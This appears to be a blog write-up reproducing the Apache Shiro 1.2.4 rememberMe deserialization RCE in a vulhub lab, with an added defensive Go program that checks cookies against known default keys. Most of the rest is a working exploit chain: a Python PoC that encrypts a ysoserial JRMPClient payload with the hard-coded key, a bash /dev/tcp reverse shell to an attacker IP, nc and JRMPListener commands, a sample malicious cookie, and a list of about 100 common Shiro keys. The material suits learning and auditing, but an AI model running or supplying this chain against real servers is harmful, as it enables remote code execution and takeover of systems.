Reproducing the Shiro RememberMe 1.2.4 Deserialization Command Execution Vulnerability

Time: 2024-04-15 21:31:01

0x00 Affected versions

Apache Shiro <= 1.2.4

0x01 Root cause

Shiro uses CookieRememberMeManager by default. Its cookie-handling flow is:
read the rememberMe cookie value --> Base64 decode --> AES decrypt --> deserialize
However, the AES key is hard-coded, so an attacker can craft malicious data and turn the deserialization step into RCE.
Payload construction:
the 16-byte key --> append the serialized payload --> AES encrypt --> Base64 encode --> send as the cookie
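The pipeline above is also the basis of a defensive check: decode a rememberMe cookie, split off the leading 16-byte IV, attempt AES-CBC decryption under each known default key, and accept a key only when the plaintext is a Java serialization stream (magic bytes 0xAC 0xED 0x00 0x05). Run against your own deployment, a hit shows the instance is still using a guessable key; run against a cookie captured during an incident, it tells you whether the cookie could have been forged at all. The Go program below is an added example, not code from this post or from the Shiro project. It uses only the standard library, embeds a handful of keys from the list at the end of this page, and builds its own sample cookies from a constructed plaintext (the stream magic followed by `org.apache.shiro.subject.SimplePrincipalCollection`, the class Shiro serializes for a real login) so it runs offline.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// Keys quoted on this page: the one Shiro <= 1.2.4 ships with plus entries from the list of common keys.
var KnownDefaultKeys = []string{
	"kPH+bIxk5D2deZiIxcaaaA==",
	"4AvVhmFLUs0KTA3Kprsdag==",
	"wGiHplamyXlVB11UXWol8g==",
	"LEGEND-CAMPUS-CIPHERKEY==", // malformed entry from the list; skipped at runtime
}

// Every Java serialization stream starts with STREAM_MAGIC 0xACED and STREAM_VERSION 0x0005.
var javaSerialMagic = []byte{0xAC, 0xED, 0x00, 0x05}

// The class Shiro itself serializes into a legitimate rememberMe cookie.
const shiroPrincipalClass = "org.apache.shiro.subject.SimplePrincipalCollection"

// pkcs7Unpad strips PKCS#7 padding; the caller guarantees len(b) is a non-zero multiple of the block size.
func pkcs7Unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("bad padding length")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding bytes")
		}
	}
	return b[:len(b)-n], nil
}

// decryptRememberMe reverses the cookie pipeline described above: Base64 -> IV || ciphertext -> AES-CBC.
func decryptRememberMe(cookie string, key []byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil || len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("cookie is not a Base64 IV||ciphertext blob")
	}
	block, err := aes.NewCipher(key) // rejects key lengths AES does not accept
	if err != nil {
		return nil, err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

// AuditCookie tries each known key and returns the one that yields a Java serialization stream ("" if none).
// A hit means the deployment is exposed whatever this cookie holds; a hit without Shiro's class is suspicious.
func AuditCookie(cookie string, keys []string) (hitKey string, looksLikeShiro bool) {
	for _, k := range keys {
		key, err := base64.StdEncoding.DecodeString(k)
		if err != nil {
			continue // not valid Base64; the page's list has a few such entries
		}
		pt, err := decryptRememberMe(cookie, key)
		if err != nil || !bytes.HasPrefix(pt, javaSerialMagic) {
			continue
		}
		return k, bytes.Contains(pt, []byte(shiroPrincipalClass))
	}
	return "", false
}

// BuildSampleCookie writes a cookie in Shiro's format so the audit can run offline (constructed fixture; fixed IV).
func BuildSampleCookie(keyB64 string, plaintext []byte) string {
	key, _ := base64.StdEncoding.DecodeString(keyB64)
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	iv := bytes.Repeat([]byte{0x01}, aes.BlockSize)
	n := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(append(iv, ct...))
}

// SamplePlaintext is a constructed stand-in for a login cookie's content, not a real serialized object.
func SamplePlaintext() []byte { return append(append([]byte{}, javaSerialMagic...), shiroPrincipalClass...) }

func main() {
	vulnerable := BuildSampleCookie("kPH+bIxk5D2deZiIxcaaaA==", SamplePlaintext()) // the page's default key
	hardened := BuildSampleCookie("AAAAAAAAAAAAAAAAAAAAAA==", SamplePlaintext())   // constructed non-default key
	fmt.Println(AuditCookie(vulnerable, KnownDefaultKeys))
	fmt.Println(AuditCookie(hardened, KnownDefaultKeys))
}
```

A hit on any known key means the instance has to be re-keyed: Shiro 1.2.5 and later no longer ship a fixed key and generate one at startup, and a hand-configured CookieRememberMeManager should get a per-deployment random cipherKey (rotating it invalidates every outstanding rememberMe cookie, which is the intended effect). In a default configuration a genuine cookie names SimplePrincipalCollection, so a cookie that decrypts under the key but does not is worth pulling from the access logs during incident response.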

0x02 Lab environment

docker pull vulhub/shiro

Then open 127.0.0.1:8080

0x03 Reproducing the vulnerability

POC:

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    # Let ysoserial produce the serialized JRMPClient payload; the argument is the JRMP listener's host:port
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()  # PKCS#7 padding
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")  # hard-coded default key in Shiro <= 1.2.4
    iv = uuid.uuid4().bytes  # random 16-byte IV; Shiro expects it prepended to the ciphertext
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print("rememberMe={0}".format(payload.decode()))

Run the script on the attacking machine to generate the malicious cookie

python shiro_shell.py 1.1.1.1:1099     # 1.1.1.1 is your attacking machine's IP; the port can be anything, but the listener below must use the same one

The generated cookie looks similar to the figure below

Building the reverse shell
The reverse shell command needs to be encoded; use: http://www.jackson-t.ca/runtime-exec-payloads.html
The reverse shell command is as follows

bash -i >& /dev/tcp/1.1.1.1/7878 0>&1             # 1.1.1.1 is the attacking machine's IP

Start the listeners on the attacking machine
Open two windows on attacking machine 1.1.1.1;
in one of them, listen for the shell

nc -lvp 7878

In the other, listen on the JRMP port

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'encoded reverse shell command'

Send the generated malicious cookie with httpie
Run the following on attacking machine 1.1.1.1

http 1.1.1.2:8080/login 'Cookie:rememberMe=UfsKYXK1SIOgFdnOxdPidh09yGZv6Medaj/T0E5sE9xhxMP69kzlNKsEdfHUhTgD12ea7NOv+xRhnZSGhUi9rz1tYVPu5QHfINrMS4I+lTe82RO5PY1vJrmMwP/NnBvjfGtTWTwRSNl1AhNgJrAhrEBStf+cpnBMwmoWxiexDjm2BavY/lSLe52hZhCEcr0zv/kqC9PdhBfY326+ux/RkE0pfwfZNMEUrPIZw8gBJkCIDTb1qj+W32+YinOKCkye/i+GmKHifPoMSt91q0nR/NQnxyu4UJQoULSbCI3/vXKtGm7P+YNqhH6smVPIoTxqtAqWTJG7eOafDPC2azUlhbLcmjql7qDL2wPpv4JOxB0fLIwdkQqSn9DCBty2BfKDqf8I/lvTbKqHHfVIUMdjYQ=='

Check the listener output on the attacking machine
Both ports receive a connection


The shell is returned on port 7878

100 commonly used keys

4AvVhmFLUs0KTA3Kprsdag==
3AvVhmFLUs0KTA3Kprsdag==
Z3VucwAAAAAAAAAAAAAAAA==
2AvVhdsgUs0FSA3SDFAdag==
wGiHplamyXlVB11UXWol8g==
kPH+bIxk5D2deZiIxcaaaA==
fCq+/xW488hMTCD+cmJ3aQ==
1QWLxg+NYmxraMoxAXu/Iw==
ZUdsaGJuSmxibVI2ZHc9PQ==
L7RioUULEFhRyxM7a2R/Yg==
6ZmI6I2j5Y+R5aSn5ZOlAA==
r0e3c16IdVkouZgk1TKVMg==
ZWvohmPdUsAWT3=KpPqda
5aaC5qKm5oqA5pyvAAAAAA==
bWluZS1hc3NldC1rZXk6QQ==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
LEGEND-CAMPUS-CIPHERKEY==
bWljcm9zAAAAAAAAAAAAAA==
1AvVhdsgUs0FSA3SDFAdag==
5RC7uBZLkByfFfJm22q/Zw==
3AvVhdAgUs0FSA4SDFAdBg==
a3dvbmcAAAAAAAAAAAAAAA==
eXNmAAAAAAAAAAAAAAAAAA==
U0hGX2d1bnMAAAAAAAAAAA==
Ymx1ZXdoYWxlAAAAAAAAAA==
UGlzMjAxNiVLeUVlXiEjLw==
7AvVhmFLUs0KTA3Kprsdag==
MTIzNDU2Nzg5MGFiY2RlZg==
OY//C4rhfwNxCQAQCrQQ1Q==
FP7qKJzdJOGkzoQzo2wTmA==
SkZpbmFsQmxhZGUAAAAAAA==
2cVtiE83c4lIrELJwKGJUw==
MDgBSEFqYIoWYezkWDywig==
0Av6jWaXCkCu5A9nJbPxLI==
fPimdozRt+SSSbZS8/HARA==
U3ByaW5nQmxhZGUAAAAAAA==
0AvVhmFLUs0KTA3Kprsdag==
25BsmdYwjnfcWmnhAciDDg==
3JvYhmBLUs0ETA5Kprsdag==
5AvVhmFLUs0KTA3Kprsdag==
6AvVhmFLUs0KTA3Kprsdag==
6NfXkC7YVCV5DASIrEm1Rg==
cmVtZW1iZXJNZQAAAAAAAA==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag==
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
aU1pcmFjbGVpTWlyYWNsZQ==
bXRvbnMAAAAAAAAAAAAAAA==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
3qDVdLawoIr1xFd6ietnwg==
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAA==
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUS0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
CrownKey==a12d/dakdad
empodDEyMwAAAAAAAAAAAA==
A7UzJgh1+EWj5oBFi+mSgw==
YTM0NZomIzI2OTsmIzM0NTueYQ==
c2hpcm9fYmF0aXMzMgAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA==
Z3h6eWd4enklMjElMjElMjE=
Q01TX0JGTFlLRVlfMjAxOQ==
ZAvph3dsQs0FSL3SDFAdag==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==